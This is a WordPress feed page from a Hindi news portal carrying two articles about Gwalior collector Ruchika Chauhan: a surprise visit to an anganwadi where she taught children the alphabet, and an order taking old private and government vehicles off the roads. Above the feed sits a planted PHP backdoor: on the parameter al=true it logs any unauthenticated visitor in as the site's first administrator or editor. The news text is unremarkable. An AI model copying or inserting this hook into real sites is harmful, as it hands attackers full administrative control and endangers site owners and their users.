// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Collector Ruchika Chauhan – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 25 Jan 2026 09:26:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 ग्वालियर: अचानक आंगनवाड़ी पहुंचीं कलेक्टर रूचिका चौहान, बच्चों को ABCD सिखाने का अनोखा तरीका https://pratyushaashakinayikiran.com/?p=194358 Sun, 25 Jan 2026 09:26:00 +0000 https://pratyushaashakinayikiran.com/?p=194358 ग्वालियर
प्रशासनिक सख्ती के साथ संवेदनशीलता की मिसाल पेश करते हुए ग्वालियर जिला कलेक्टर आईएएस रूचिका चौहान एक अलग ही भूमिका में नजर आईं। शनिवार को वे बिना पूर्व सूचना अपने सरकारी आवास से निकलकर आंगनबाड़ी और स्कूलों के निरीक्षण पर पहुंचीं, जहां उन्होंने बच्चों के बीच बैठकर टीचर की भूमिका निभाई।

आंगनबाड़ी केंद्र में पहुंचते ही कलेक्टर रूचिका चौहान नन्हे बच्चों के बीच घुल-मिल गईं। उन्होंने नर्सरी कक्षा के बच्चों से बातचीत की और बेहद आसान व रोचक तरीके से अंग्रेजी वर्णमाला ABCD लिखना व पहचानना सिखाया। कलेक्टर को इस रूप में देखकर बच्चे भी बेहद खुश नजर आए।

शिक्षकों से की सीधी बातचीत

निरीक्षण के दौरान कलेक्टर ने स्कूल में मौजूद शिक्षकों और स्टाफ से पढ़ाई की गुणवत्ता, उपस्थिति और शैक्षणिक व्यवस्थाओं को लेकर विस्तार से चर्चा की। इसके बाद उन्होंने शासकीय माध्यमिक विद्यालय दानाओली सहित आसपास के अन्य शैक्षणिक संस्थानों का भी निरीक्षण किया।

साफ-सफाई पर दिखाई सख्ती

निरीक्षण के दौरान स्कूल परिसर, शौचालय और आसपास के क्षेत्रों की साफ-सफाई का बारीकी से जायजा लिया गया। कलेक्टर रूचिका चौहान ने नगर निगम अधिकारियों को सख्त निर्देश देते हुए कहा कि स्कूलों के अंदर और बाहर सफाई व्यवस्था में किसी भी प्रकार की लापरवाही बर्दाश्त नहीं की जाएगी। उन्होंने सड़क, गलियों और स्कूल परिसरों की नियमित सफाई सुनिश्चित करने के निर्देश भी दिए।

कलेक्टर का यह मानवीय और प्रेरणादायक रूप लोगों के बीच चर्चा का विषय बन गया है। बच्चों को पढ़ाते हुए उनका यह अंदाज प्रशासनिक अधिकारियों के लिए भी एक सकारात्मक संदेश माना जा रहा है।

]]>
ग्वालियर की सड़कों पर 20 वर्ष पुराने निजी वाहन और 15 वर्ष पुराने सरकारी वाहन सड़कों पर दौड़ते नजर नहीं आएंगे https://pratyushaashakinayikiran.com/?p=159443 Tue, 27 May 2025 13:39:00 +0000 https://pratyushaashakinayikiran.com/?p=159443 ग्वालियर
 मध्य प्रदेश के ग्वालियर जिले में वायु प्रदूषण सुधारने की ओर कलेक्टर ने बड़ा कदम उठाया है। कलेक्टर रुचिका चौहान ने पुराने वाहनों को लेकर परिवहन विभाग को एक निर्देश जारी किया है। इसके अनुसार अब जिले की सड़कों पर 20 वर्ष से अधिक पुराने निजी वाहन और 15 वर्ष से अधिक पुराने सरकारी वाहन सड़कों पर दौड़ते नजर नहीं आएंगे। अगर ऐसा वाहन चलता मिलता है तो परिवहन विभाग इनको जब्त कर लेगा। जहां से इन्हें परिवहन विभाग के स्क्रैप केंद्र भेज दिया जाएगा।

कलेक्टर ने तीन दिन में मांगी सूची

कलेक्टर रुचिका चौहान ने परिवहन विभाग के अधिकारियों को ऐसे वाहनों की सूची तीन दिन में पेश करने का निर्देश दिए हैं। इसके साथ ही सरकार के प्रावधान को भी प्रस्तुत किया जाए, ताकि प्रावधानों के अनुरूप प्रभावी कार्रवाई की जा सके। कलेक्टर ने कहा कि प्राप्त सूची के आधार पर वाहनों का चलना प्रतिबंधित किया जाएगा।

अब सड़कों पर न चलें पुराने वाहन

कलेक्टर ने सोमवार को अंतरविभागीय समन्वय समिति की बैठक में विभागीय योजनाओं और कार्यक्रमों की समीक्षा करते हुए यह निर्देश दिए हैं. शासन के प्रावधानों एवं प्रदूषण को देखते हुए ग्वालियर जिले में पुराने वाहन सड़क पर न चलें. इस पर प्रभावी कार्रवाई की जाएगी. निजी एवं शासकीय वाहनों के उपयोग की समय-सीमा शासन द्वारा निर्धारित की गई है.
बारिश से पहले सड़कों का पूरा हो निर्माण

कलेक्टर ने बरसात से पूर्व सड़कों की मरम्मत के कार्यों की समीक्षा करते हुए निर्माण एजेंसियों को निर्देशित किया है कि वे अपने-अपने विभाग की सभी सड़कों की मरम्मत बरसात से पहले करा लें. इसके साथ ही पुल-पुलियों की मरम्मत कराएं और शामन बोर्ड जरूर लगवाएं. शाइन बोर्ड पर ग्लोशाइन पट्टी भी लगाई जाए ताकि अंधेरे में भी नागरिकों को दिखाई दे सकें.

 जिले में 12 लाख 53 हजार वाहन रजिस्टर्ड

ग्वालियर जिले में लगभग 12 लाख 53 हजार वाहन रजिस्टर्ड है। इनमें 01 लाख 33 हजार निजी वाहन 20 साल से ज्यादा पुराने शामिल है। वहीं प्रदेश में लगभग 13 लाख 50 हजार वाहन स्क्रैप कराने लायक है। इनमें दो पहिया,तीन पहिया और चार पहिया वाहन शामिल है। निजी वाहन स्क्रैप कराने पर रोड टैक्स में 25% की छूट मिलेगी। वहीं कमर्शियल वाहन पर 15% तक की रोड टैक्स की छूट मिलेगी। शासन द्वारा अधिकृत स्क्रैप सेंटर पर डिस्पोजल करने पर ही यह छूट दी जाएगी।

]]>